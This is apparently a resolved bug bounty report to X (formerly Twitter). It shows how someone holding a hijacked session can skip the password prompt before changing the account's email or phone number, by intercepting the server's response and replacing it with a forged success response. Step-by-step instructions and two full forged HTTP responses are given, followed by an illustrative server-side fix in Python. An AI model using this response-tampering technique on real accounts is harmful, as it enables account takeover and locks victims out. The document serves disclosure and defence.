
Bypass Password Authentication for updating email and phone number - Security Vulnerability

High
X
X (Formerly Twitter)
Reported by jayesh25

Vulnerability Details

Technical details and impact analysis

Improper Authentication - Generic
**Summary:** [Additional requirement for authentication is an extra layer of security for a person's Twitter account. Instead of only entering the password at the time of log in, twitter further Introduces additional layer of security by prompting users to enter their password before attempting to update any crucial Information such as email ID or phone numbers. This additional security measure from twitter provides protection to the victim's account, considering that a victim's session may have been hijacked by a hacker, however, due to this additional layer of security Implemented by twitter the hacker would not be able to change the victim's personal details such as phone number or email id, as they will be prompted to enter the victim's account password In order to make these changes, which will not be known to a hacker (In case of a session hijack) This report is to bring to your attention a security vulnerability that will allow hackers that have hijacked a user's session to bypass the password screen (Without knowing the user's password) that is prompted to a user before trying to update the email ID and phone number under Settings and Privacy -> Accounts.] **Description:** [For users that have had their twitter session hijacked, this security vulnerability would enable a hacker to completely take over a victim's account as they will be able to change the victim's e-mail ID and phone number by bypassing the password screen prompted during the verification process. This will allow the hacker to reset the password either by requesting for a link and/or code on the email/mobile updated by them against the victim's account, therefore resulting in a complete account take over. The security vulnerability is basically related to client side processing that is undertaken based on the response received from the server. 
For example, when the attacker enters a password and clicks 'Next', the client generates a flow token and sends it to the server with the request. The server validates the password and returns a response telling the client either to load the next page or to show an error such as 'Wrong password'. Because the client trusts this response, the request and response can be intercepted and manipulated: even though the attacker entered an incorrect password, the server's error response can be replaced with a valid JSON success response carrying the flow token that the client originally sent. Twitter's client then believes authentication succeeded, the password screen is bypassed, and the attacker can update the victim's email ID and phone number without any further authentication.

## Steps To Reproduce:

Assume the victim's Twitter session has been hijacked and is in a logged-in state for the attacker. Follow the steps below to reproduce the vulnerability.

### Security Vulnerability #1 - Update Victim's E-mail ID - Bypass password screen

1. Go to Settings and Privacy -> Accounts
2. Click on Email -> Update email address
3. Enter any random password and click on 'Next'
4. Intercept the above request
5. Copy the flow token up to `:`
6. Forward the client request to the server and intercept the server's response to this request
7. Replace the intercepted server response with the text below (paste the flow token from step 5 where indicated and remove the [square brackets])
8. Forward the modified server response to the client
9. This bypasses the password screen regardless of whether the password was correct or incorrect. You must now enter your email ID and verify it in order to add it to the victim's account.

Modified server response for the email flow (copy from start to end):

```http
HTTP/1.1 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://twitter.com
cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
connection: close
content-disposition: attachment; filename=json.json
Content-Length: 2732
content-type: application/json; charset=utf-8
date: Mon, 06 Jan 2020 21:12:15 GMT
expires: Tue, 31 Mar 1981 05:00:00 GMT
last-modified: Mon, 06 Jan 2020 21:12:15 GMT
pragma: no-cache
server: tsa_k
strict-transport-security: max-age=631138519
x-connection-hash: 1d41600d4a1940ad3cab723b3ec0b57a
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-response-time: 308
x-tsa-request-body-time: 1
x-twitter-response-tags: BouncerCompliant
x-xss-protection: 0

{"flow_token":"[PASTE FLOW TOKEN HERE]:1","status":"success","subtasks":[{"subtask_id":"EmailAssocEnterEmail","enter_email":{"primary_text":{"text":"Change email","entities":[]},"secondary_text":{"text":"Your current email is ███. What would you like to update it to? Your email is not displayed in your public profile on Twitter.","entities":[]},"hint_text":"Email address","next_link":{"link_type":"subtask","link_id":"next_link","label":"Next","subtask_id":"EmailAssocVerifyEmail"},"skip_link":{"link_type":"abort","link_id":"cancel_link","label":"Cancel"},"discoverability_setting":{"primary_text":{"text":"Let people who have your email address find and connect with you on Twitter. Learn more","entities":[{"from_index":77,"to_index":87,"navigation_link":{"link_type":"web_link","link_id":"open_web_link","label":"learn_more_email_phone_disco_link","url":"https://help.twitter.com/safety-and-security/email-and-phone-discoverability-settings"}}]},"value_type":"boolean","value_identifier":"email_discoverability_setting","value_data":{"boolean_data":{"initial_value":false}}}}},{"subtask_id":"EmailAssocVerifyEmail","email_verification":{"primary_text":{"text":"We sent you a code","entities":[]},"secondary_text":{"text":"Enter it below to verify your email.\t","entities":[]},"detail_text":{"text":"Didn't receive code?","entities":[{"from_index":0,"to_index":20,"navigation_link":{"link_type":"subtask","link_id":"resend_email_verification_link","subtask_id":"DidNotReceiveEmailDialog"}}]},"hint_text":"Verification code","email":{"subtask_data_reference":{"key":"email","subtask_id":"EmailAssocEnterEmail"}},"name":{"subtask_data_reference":{"key":"name","subtask_id":"EmailAssocEnterEmail"}},"next_link":{"link_type":"task","link_id":"next_link","label":"Verify"},"fail_link":{"link_type":"subtask","link_id":"fail_link","subtask_id":"EmailAssocEnterEmail"},"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Cancel","subtask_id":"EmailAssocEnterEmail"},"verification_status_polling_enabled":false}},{"subtask_id":"DidNotReceiveEmailDialog","menu_dialog":{"primary_text":{"text":"Didn’t receive the code?","entities":[]},"primary_action_links":[{"link_type":"subtask","link_id":"email_link","label":"Resend","subtask_navigation_context":{"action":"resend_email"},"subtask_id":"EmailAssocVerifyEmail"}],"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Cancel","subtask_navigation_context":{"action":"cancel_email_dialog"},"subtask_id":"EmailAssocVerifyEmail"},"dismiss_link":{"link_type":"subtask","link_id":"dismiss_link","subtask_navigation_context":{"action":"dismiss_email_dialog"},"subtask_id":"EmailAssocVerifyEmail"}}}]}
```

### Security Vulnerability #2 - Update Victim's phone number - Bypass password screen

1. Go to Settings and Privacy -> Accounts
2. Click on Phone -> Add/Update phone number
3. Enter any random password and click on 'Next'
4. Intercept the above request
5. Copy the flow token up to `:`
6. Forward the client request to the server and intercept the server's response to this request
7. Replace the intercepted server response with the text below (paste the flow token from step 5 where indicated and remove the [square brackets])
8. Forward the modified server response to the client
9. This bypasses the password screen regardless of whether the password was correct or incorrect. You must now enter your mobile number and verify it in order to add the phone number to the victim's account.

Modified server response for the phone flow (copy from start to end):

```http
HTTP/1.1 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://twitter.com
cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
connection: close
content-disposition: attachment; filename=json.json
Content-Length: 16612
content-type: application/json; charset=utf-8
date: Mon, 06 Jan 2020 21:36:13 GMT
expires: Tue, 31 Mar 1981 05:00:00 GMT
last-modified: Mon, 06 Jan 2020 21:36:13 GMT
pragma: no-cache
server: tsa_k
strict-transport-security: max-age=631138519
x-connection-hash: be41fa15964cca748cd82c001728c777
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-response-time: 305
x-tsa-request-body-time: 0
x-twitter-response-tags: BouncerCompliant
x-xss-protection: 0

{"flow_token":"[PASTE FLOW TOKEN HERE]:1","status":"success","subtasks":[{"subtask_id":"EnterPhoneForAssociation","enter_phone":{"primary_text":{"text":"Add a phone number","entities":[]},"secondary_text":{"text":"Enter the phone number you’d like to associate with your Twitter account. You’ll get a verification code sent here.","entities":[]},"hint_text":"Your phone number","next_link":{"link_type":"subtask","link_id":"next_link","label":"Next","subtask_id":"PhoneAssociationVerificationAlert"},"skip_link":{"link_type":"abort","link_id":"cancel_link","label":"Cancel"},"discoverability_setting":{"primary_text":{"text":"Let people who have your phone number find and connect with you on Twitter. Learn more","entities":[{"from_index":76,"to_index":86,"navigation_link":{"link_type":"web_link","link_id":"open_web_link","label":"learn_more_email_phone_disco_link","url":"https://help.twitter.com/safety-and-security/email-and-phone-discoverability-settings"}}]},"value_type":"boolean","value_identifier":"phone_discoverability_setting","value_data":{"boolean_data":{"initial_value":false}}},"country_codes":[{"id":"AF","text":{"text":"+93 Afghanistan","entities":[]}},{"id":"AL","text":{"text":"+355 Albania","entities":[]}},{"id":"DZ","text":{"text":"+213 Algeria","entities":[]}},{"id":"AS","text":{"text":"+1 American Samoa","entities":[]}},{"id":"AD","text":{"text":"+376 Andorra","entities":[]}},{"id":"AO","text":{"text":"+244 Angola","entities":[]}},{"id":"AI","text":{"text":"+1 Anguilla","entities":[]}},{"id":"AG","text":{"text":"+1 Antigua and Barbuda","entities":[]}},{"id":"AR","text":{"text":"+54 Argentina","entities":[]}},{"id":"AM","text":{"text":"+374 Armenia","entities":[]}},{"id":"AW","text":{"text":"+297 Aruba","entities":[]}},{"id":"AU","text":{"text":"+61 Australia","entities":[]}},{"id":"AT","text":{"text":"+43 Austria","entities":[]}},{"id":"AZ","text":{"text":"+994 Azerbaijan","entities":[]}},{"id":"BS","text":{"text":"+1 Bahamas","entities":[]}},{"id":"BH","text":{"text":"+973 Bahrain","entities":[]}},{"id":"BD","text":{"text":"+880 Bangladesh","entities":[]}},{"id":"BB","text":{"text":"+1 Barbados","entities":[]}},{"id":"BY","text":{"text":"+375 Belarus","entities":[]}},{"id":"BE","text":{"text":"+32 Belgium","entities":[]}},{"id":"BZ","text":{"text":"+501 Belize","entities":[]}},{"id":"BJ","text":{"text":"+229 Benin","entities":[]}},{"id":"BM","text":{"text":"+1 Bermuda","entities":[]}},{"id":"BT","text":{"text":"+975 Bhutan","entities":[]}},{"id":"BO","text":{"text":"+591 Bolivia","entities":[]}},{"id":"BQ","text":{"text":"+599 Bonaire, Sint Eustatius and Saba","entities":[]}},{"id":"BA","text":{"text":"+387 Bosnia and Herzegovina","entities":[]}},{"id":"BW","text":{"text":"+267 Botswana","entities":[]}},{"id":"BR","text":{"text":"+55 Brazil","entities":[]}},{"id":"VG","text":{"text":"+1 British Virgin Islands","entities":[]}},{"id":"BN","text":{"text":"+673 Brunei","entities":[]}},{"id":"BG","text":{"text":"+359 Bulgaria","entities":[]}},{"id":"BF","text":{"text":"+226 Burkina Faso","entities":[]}},{"id":"BI","text":{"text":"+257 Burundi","entities":[]}},{"id":"KH","text":{"text":"+855 Cambodia","entities":[]}},{"id":"CM","text":{"text":"+237 Cameroon","entities":[]}},{"id":"CA","text":{"text":"+1 Canada","entities":[]}},{"id":"CV","text":{"text":"+238 Cape Verde","entities":[]}},{"id":"KY","text":{"text":"+1 Cayman Islands","entities":[]}},{"id":"CF","text":{"text":"+236 Central African Republic","entities":[]}},{"id":"TD","text":{"text":"+235 Chad","entities":[]}},{"id":"CL","text":{"text":"+56 Chile","entities":[]}},{"id":"CN","text":{"text":"+86 China","entities":[]}},{"id":"CO","text":{"text":"+57 Colombia","entities":[]}},{"id":"KM","text":{"text":"+269 Comoros","entities":[]}},{"id":"CG","text":{"text":"+242 Congo","entities":[]}},{"id":"CK","text":{"text":"+682 Cook Islands","entities":[]}},{"id":"CR","text":{"text":"+506 Costa Rica","entities":[]}},{"id":"HR","text":{"text":"+385 Croatia","entities":[]}},{"id":"CU","text":{"text":"+53 Cuba","entities":[]}},{"id":"CW","text":{"text":"+599 Curaçao","entities":[]}},{"id":"CY","text":{"text":"+357 Cyprus","entities":[]}},{"id":"CZ","text":{"text":"+420 Czech Republic","entities":[]}},{"id":"CI","text":{"text":"+225 Côte d'Ivoire","entities":[]}},{"id":"DK","text":{"text":"+45 Denmark","entities":[]}},{"id":"DJ","text":{"text":"+253 Djibouti","entities":[]}},{"id":"DM","text":{"text":"+1 Dominica","entities":[]}},{"id":"DO","text":{"text":"+1 Dominican Republic","entities":[]}},{"id":"EC","text":{"text":"+593 Ecuador","entities":[]}},{"id":"EG","text":{"text":"+20 Egypt","entities":[]}},{"id":"SV","text":{"text":"+503 El Salvador","entities":[]}},{"id":"GQ","text":{"text":"+240 Equatorial Guinea","entities":[]}},{"id":"ER","text":{"text":"+291 Eritrea","entities":[]}},{"id":"EE","text":{"text":"+372 Estonia","entities":[]}},{"id":"ET","text":{"text":"+251 Ethiopia","entities":[]}},{"id":"FK","text":{"text":"+500 Falkland Islands","entities":[]}},{"id":"FO","text":{"text":"+298 Faroe Islands","entities":[]}},{"id":"FJ","text":{"text":"+679 Fiji","entities":[]}},{"id":"FI","text":{"text":"+358 Finland","entities":[]}},{"id":"FR","text":{"text":"+33 France","entities":[]}},{"id":"GF","text":{"text":"+594 French Guiana","entities":[]}},{"id":"PF","text":{"text":"+689 French Polynesia","entities":[]}},{"id":"GA","text":{"text":"+241 Gabon","entities":[]}},{"id":"GM","text":{"text":"+220 Gambia","entities":[]}},{"id":"GE","text":{"text":"+995 Georgia","entities":[]}},{"id":"DE","text":{"text":"+49 Germany","entities":[]}},{"id":"GH","text":{"text":"+233 Ghana","entities":[]}},{"id":"GI","text":{"text":"+350 Gibraltar","entities":[]}},{"id":"GR","text":{"text":"+30 Greece","entities":[]}},{"id":"GL","text":{"text":"+299 Greenland","entities":[]}},{"id":"GD","text":{"text":"+1 Grenada","entities":[]}},{"id":"GP","text":{"text":"+590 Guadeloupe","entities":[]}},{"id":"GU","text":{"text":"+1 Guam","entities":[]}},{"id":"GT","text":{"text":"+502 Guatemala","entities":[]}},{"id":"GN","text":{"text":"+224 Guinea","entities":[]}},{"id":"GW","text":{"text":"+245 Guinea-Bissau","entities":[]}},{"id":"GY","text":{"text":"+592 Guyana","entities":[]}},{"id":"HT","text":{"text":"+509 Haiti","entities":[]}},{"id":"HN","text":{"text":"+504 Honduras","entities":[]}},{"id":"HK","text":{"text":"+852 Hong Kong","entities":[]}},{"id":"HU","text":{"text":"+36 Hungary","entities":[]}},{"id":"IS","text":{"text":"+354 Iceland","entities":[]}},{"id":"IN","text":{"text":"+91 India","entities":[]}},{"id":"ID","text":{"text":"+62 Indonesia","entities":[]}},{"id":"IR","text":{"text":"+98 Iran","entities":[]}},{"id":"IQ","text":{"text":"+964 Iraq","entities":[]}},{"id":"IE","text":{"text":"+353 Ireland","entities":[]}},{"id":"IM","text":{"text":"+44 Isle Of Man","entities":[]}},{"id":"IL","text":{"text":"+972 Israel","entities":[]}},{"id":"IT","text":{"text":"+39 Italy","entities":[]}},{"id":"JM","text":{"text":"+1 Jamaica","entities":[]}},{"id":"JP","text":{"text":"+81 Japan","entities":[]}},{"id":"JE","text":{"text":"+44 Jersey","entities":[]}},{"id":"JO","text":{"text":"+962 Jordan","entities":[]}},{"id":"KZ","text":{"text":"+7 Kazakhstan","entities":[]}},{"id":"KE","text":{"text":"+254 Kenya","entities":[]}},{"id":"KI","text":{"text":"+686 Kiribati","entities":[]}},{"id":"KW","text":{"text":"+965 Kuwait","entities":[]}},{"id":"KG","text":{"text":"+996 Kyrgyzstan","entities":[]}},{"id":"LA","text":{"text":"+856 Laos","entities":[]}},{"id":"LV","text":{"text":"+371 Latvia","entities":[]}},{"id":"LB","text":{"text":"+961 Lebanon","entities":[]}},{"id":"LS","text":{"text":"+266 Lesotho","entities":[]}},{"id":"LR","text":{"text":"+231 Liberia","entities":[]}},{"id":"LY","text":{"text":"+218 Libya","entities":[]}},{"id":"LI","text":{"text":"+423 Liechtenstein","entities":[]}},{"id":"LT","text":{"text":"+370 Lithuania","entities":[]}},{"id":"LU","text":{"text":"+352 Luxembourg","entities":[]}},{"id":"MO","text":{"text":"+853 Macao","entities":[]}},{"id":"MK","text":{"text":"+389 Macedonia","entities":[]}},{"id":"MG","text":{"text":"+261 Madagascar","entities":[]}},{"id":"MW","text":{"text":"+265 Malawi","entities":[]}},{"id":"MY","text":{"text":"+60 Malaysia","entities":[]}},{"id":"MV","text":{"text":"+960 Maldives","entities":[]}},{"id":"ML","text":{"text":"+223 Mali","entities":[]}},{"id":"MT","text":{"text":"+356 Malta","entities":[]}},{"id":"MQ","text":{"text":"+596 Martinique","entities":[]}},{"id":"MR","text":{"text":"+222 Mauritania","entities":[]}},{"id":"MU","text":{"text":"+230 Mauritius","entities":[]}},{"id":"YT","text":{"text":"+262 Mayotte","entities":[]}},{"id":"MX","text":{"text":"+52 Mexico","entities":[]}},{"id":"FM","text":{"text":"+691 Micronesia","entities":[]}},{"id":"MD","text":{"text":"+373 Moldova","entities":[]}},{"id":"MC","text":{"text":"+377 Monaco","entities":[]}},{"id":"MN","text":{"text":"+976 Mongolia","entities":[]}},{"id":"ME","text":{"text":"+382 Montenegro","entities":[]}},{"id":"MS","text":{"text":"+1 Montserrat","entities":[]}},{"id":"MA","text":{"text":"+212 Morocco","entities":[]}},{"id":"MZ","text":{"text":"+258 Mozambique","entities":[]}},{"id":"MM","text":{"text":"+95 Myanmar","entities":[]}},{"id":"NA","text":{"text":"+264 Namibia","entities":[]}},{"id":"NR","text":{"text":"+674 Nauru","entities":[]}},{"id":"NP","text":{"text":"+977 Nepal","entities":[]}},{"id":"NL","text":{"text":"+31 Netherlands","entities":[]}},{"id":"NC","text":{"text":"+687 New Caledonia","entities":[]}},{"id":"NZ","text":{"text":"+64 New Zealand","entities":[]}},{"id":"NI","text":{"text":"+505 Nicaragua","entities":[]}},{"id":"NE","text":{"text":"+227 Niger","entities":[]}},{"id":"NG","text":{"text":"+234 Nigeria","entities":[]}},{"id":"NF","text":{"text":"+672 Norfolk Island","entities":[]}},{"id":"MP","text":{"text":"+1 Northern Mariana Islands","entities":[]}},{"id":"NO","text":{"text":"+47 Norway","entities":[]}},{"id":"OM","text":{"text":"+968 Oman","entities":[]}},{"id":"PK","text":{"text":"+92 Pakistan","entities":[]}},{"id":"PS","text":{"text":"+970 Palestine","entities":[]}},{"id":"PA","text":{"text":"+507 Panama","entities":[]}},{"id":"PG","text":{"text":"+675 Papua New Guinea","entities":[]}},{"id":"PY","text":{"text":"+595 Paraguay","entities":[]}},{"id":"PE","text":{"text":"+51 Peru","entities":[]}},{"id":"PH","text":{"text":"+63 Philippines","entities":[]}},{"id":"PL","text":{"text":"+48 Poland","entities":[]}},{"id":"PT","text":{"text":"+351 Portugal","entities":[]}},{"id":"PR","text":{"text":"+1 Puerto Rico","entities":[]}},{"id":"QA","text":{"text":"+974 Qatar","entities":[]}},{"id":"RE","text":{"text":"+262 Reunion","entities":[]}},{"id":"RO","text":{"text":"+40 Romania","entities":[]}},{"id":"RU","text":{"text":"+7 Russia","entities":[]}},{"id":"RW","text":{"text":"+250 Rwanda","entities":[]}},{"id":"KN","text":{"text":"+1 Saint Kitts And Nevis","entities":[]}},{"id":"LC","text":{"text":"+1 Saint Lucia","entities":[]}},{"id":"MF","text":{"text":"+590 Saint Martin","entities":[]}},{"id":"VC","text":{"text":"+1 Saint Vincent And The Grenadines","entities":[]}},{"id":"WS","text":{"text":"+685 Samoa","entities":[]}},{"id":"SM","text":{"text":"+378 San Marino","entities":[]}},{"id":"ST","text":{"text":"+239 Sao Tome And Principe","entities":[]}},{"id":"SA","text":{"text":"+966 Saudi Arabia","entities":[]}},{"id":"SN","text":{"text":"+221 Senegal","entities":[]}},{"id":"RS","text":{"text":"+381 Serbia","entities":[]}},{"id":"SC","text":{"text":"+248 Seychelles","entities":[]}},{"id":"SL","text":{"text":"+232 Sierra Leone","entities":[]}},{"id":"SG","text":{"text":"+65 Singapore","entities":[]}},{"id":"SX","text":{"text":"+1 Sint Maarten (Dutch part)","entities":[]}},{"id":"SK","text":{"text":"+421 Slovakia","entities":[]}},{"id":"SI","text":{"text":"+386 Slovenia","entities":[]}},{"id":"SB","text":{"text":"+677 Solomon Islands","entities":[]}},{"id":"SO","text":{"text":"+252 Somalia","entities":[]}},{"id":"ZA","text":{"text":"+27 South Africa","entities":[]}},{"id":"KR","text":{"text":"+82 South Korea","entities":[]}},{"id":"SS","text":{"text":"+211 South Sudan","entities":[]}},{"id":"ES","text":{"text":"+34 Spain","entities":[]}},{"id":"LK","text":{"text":"+94 Sri Lanka","entities":[]}},{"id":"SR","text":{"text":"+597 Suriname","entities":[]}},{"id":"SZ","text":{"text":"+268 Swaziland","entities":[]}},{"id":"SE","text":{"text":"+46 Sweden","entities":[]}},{"id":"CH","text":{"text":"+41 Switzerland","entities":[]}},{"id":"TW","text":{"text":"+886 Taiwan","entities":[]}},{"id":"TJ","text":{"text":"+992 Tajikistan","entities":[]}},{"id":"TZ","text":{"text":"+255 Tanzania","entities":[]}},{"id":"TH","text":{"text":"+66 Thailand","entities":[]}},{"id":"CD","text":{"text":"+243 The Democratic Republic Of Congo","entities":[]}},{"id":"TL","text":{"text":"+670 Timor-Leste","entities":[]}},{"id":"TG","text":{"text":"+228 Togo","entities":[]}},{"id":"TO","text":{"text":"+676 Tonga","entities":[]}},{"id":"TT","text":{"text":"+1 Trinidad and Tobago","entities":[]}},{"id":"TN","text":{"text":"+216 Tunisia","entities":[]}},{"id":"TR","text":{"text":"+90 Turkey","entities":[]}},{"id":"TM","text":{"text":"+993 Turkmenistan","entities":[]}},{"id":"TC","text":{"text":"+1 Turks And Caicos Islands","entities":[]}},{"id":"TV","text":{"text":"+688 Tuvalu","entities":[]}},{"id":"VI","text":{"text":"+1 U.S. Virgin Islands","entities":[]}},{"id":"UG","text":{"text":"+256 Uganda","entities":[]}},{"id":"UA","text":{"text":"+380 Ukraine","entities":[]}},{"id":"AE","text":{"text":"+971 United Arab Emirates","entities":[]}},{"id":"GB","text":{"text":"+44 United Kingdom","entities":[]}},{"id":"US","text":{"text":"+1 United States","entities":[]}},{"id":"UY","text":{"text":"+598 Uruguay","entities":[]}},{"id":"UZ","text":{"text":"+998 Uzbekistan","entities":[]}},{"id":"VU","text":{"text":"+678 Vanuatu","entities":[]}},{"id":"VE","text":{"text":"+58 Venezuela","entities":[]}},{"id":"VN","text":{"text":"+84 Vietnam","entities":[]}},{"id":"XK","text":{"text":"+383 XK","entities":[]}},{"id":"YE","text":{"text":"+967 Yemen","entities":[]}},{"id":"ZM","text":{"text":"+260 Zambia","entities":[]}},{"id":"ZW","text":{"text":"+263 Zimbabwe","entities":[]}}],"default_country_code":"IN"}},{"subtask_id":"PhoneAssociationVerificationAlert","alert_dialog":{"next_link":{"link_type":"subtask","link_id":"next_link","label":"OK","subtask_id":"PhoneAssociationVerification"},"primary_text":{"text":"Verify phone","entities":[]},"secondary_text":{"text":"We'll send your verification code to . Standard SMS, call and data fees may apply.","entities":[{"from_index":37,"to_index":37,"subtask_data_reference":{"key":"phone_number","subtask_id":"EnterPhoneForAssociation"}}]},"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Edit","subtask_id":"EnterPhoneForAssociation"}}},{"subtask_id":"PhoneAssociationVerification","phone_verification":{"primary_text":{"text":"We sent you a code","entities":[]},"secondary_text":{"text":"Enter it below to verify .","entities":[{"from_index":25,"to_index":25,"subtask_data_reference":{"key":"phone_number","subtask_id":"EnterPhoneForAssociation"}}]},"detail_text":{"text":"Didn't receive code?","entities":[{"from_index":0,"to_index":20,"navigation_link":{"link_type":"subtask","link_id":"resend_phone_verification_link","subtask_id":"DidNotReceiveSMSDialog"}}]},"hint_text":"Verification code","phone_number":{"subtask_data_reference":{"key":"phone_number","subtask_id":"EnterPhoneForAssociation"}},"next_link":{"link_type":"task","link_id":"next_link","label":"Verify"},"fail_link":{"link_type":"subtask","link_id":"fail_link","subtask_id":"EnterPhoneForAssociation"},"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Cancel","subtask_id":"EnterPhoneForAssociation"},"auto_verify_hint_text":"Waiting for SMS to arrive...","send_via_voice":false,"phone_country_code":{"subtask_data_reference":{"key":"country_code","subtask_id":"EnterPhoneForAssociation"}}}},{"subtask_id":"DidNotReceiveSMSDialog","menu_dialog":{"primary_text":{"text":"Didn’t receive the code?","entities":[]},"primary_action_links":[{"link_type":"subtask","link_id":"sms_link","label":"Resend","subtask_navigation_context":{"action":"resend_sms"},"subtask_id":"PhoneAssociationVerification"}],"cancel_link":{"link_type":"task","link_id":"skip_link","label":"Cancel"},"dismiss_link":{"link_type":"subtask","link_id":"dismiss_link","subtask_navigation_context":{"action":"dismiss_phone_dialog"},"subtask_id":"PhoneAssociationVerification"}}}]}
```

## Impact:

This is a serious security vulnerability, as it could lead to an attacker completely taking over the user's account by overriding Twitter's security control: bypassing the password screen lets them update the email ID and phone number on the victim's account, giving them complete authority over and access to it.

## Supporting Material/References:

Please see the attached video for a demonstration and the steps to reproduce this security vulnerability.

## Impact

An attacker could capitalize on the hijacked session and completely take over the victim's Twitter account by modifying the user's email ID and mobile phone number without having to authenticate with the correct password. This defeats Twitter's additional layer of security, the password prompt, and would lead to the user being locked out from ever accessing their Twitter account again.
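The defensive fix the report implies is that the server, not the client, must remember whether the password step passed. The following is an added illustrative model (not Twitter's code): flow state lives server-side keyed by the opaque flow token, and the email/phone step re-checks that record, so a forged `"status":"success"` response only fools the client, never the server. Function and store names (`_FLOWS`, `submit_contact_update`, etc.) are hypothetical; the subtask ids are the ones from the report.

```python
"""
Server-side enforcement of the password re-authentication step in a
multi-step settings flow (illustrative model, not Twitter's code).

In the report the client advances to the EmailAssocEnterEmail or
EnterPhoneForAssociation subtask because the *response* it saw said
"status": "success". Here the authoritative state stays on the server,
keyed by the opaque flow token, and every later step re-checks it.
"""
import hashlib
import hmac
import secrets
from typing import Optional

# Subtask that follows the password check in each flow (ids from the report).
NEXT_SUBTASK = {"EmailAssoc": "EmailAssocEnterEmail",
                "PhoneAssoc": "EnterPhoneForAssociation"}

# Constructed demo credential store: username -> (salt, PBKDF2 hash).
_PASSWORD_HASHES = {}
# Server-side flow state keyed by flow token; "password_verified" is
# never sent to the client, so the client cannot assert it.
_FLOWS = {}


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def register_user(username: str, password: str) -> None:
    salt = secrets.token_bytes(16)
    _PASSWORD_HASHES[username] = (salt, _hash_password(password, salt))


def verify_password(username: str, password: str) -> bool:
    salt, expected = _PASSWORD_HASHES[username]
    return hmac.compare_digest(_hash_password(password, salt), expected)


def start_flow(username: str, flow_name: str) -> str:
    """Create a flow for an already logged-in session; returns the opaque token."""
    token = secrets.token_urlsafe(32)
    _FLOWS[token] = {"user": username, "flow": flow_name,
                     "password_verified": False, "step": "EnterPassword"}
    return token


def submit_password(token: str, password: str) -> dict:
    """Password re-authentication step. Only this server-side check flips
    the verified bit; the response is informational for the client."""
    flow = _FLOWS.get(token)
    if flow is None:
        return {"status": "error", "message": "unknown flow"}
    if not verify_password(flow["user"], password):
        return {"status": "error", "message": "Wrong password"}
    flow["password_verified"] = True
    flow["step"] = NEXT_SUBTASK[flow["flow"]]
    return {"flow_token": token, "status": "success",
            "subtasks": [{"subtask_id": flow["step"]}]}


def client_next_subtask(response: dict) -> Optional[str]:
    """The client-side logic the report exploits: it trusts the response
    body to decide which screen to show next."""
    if response.get("status") == "success":
        return response["subtasks"][0]["subtask_id"]
    return None


def submit_contact_update(token: str, subtask_id: str, value: str) -> dict:
    """Next step (new email or phone). Authorization is re-derived from the
    server's own record, ignoring whatever the client believes it was shown."""
    flow = _FLOWS.get(token)
    if flow is None:
        return {"status": "error", "message": "unknown flow"}
    if not flow["password_verified"] or subtask_id != flow["step"]:
        return {"status": "error", "message": "password re-authentication required"}
    # A real service would now send the verification code to `value`.
    return {"status": "success", "pending_verification_for": value}
```

With this layout, intercepting and rewriting the password response changes only what the client renders; the subsequent update request still fails until the server has itself verified the password for that flow token.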

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Improper Authentication - Generic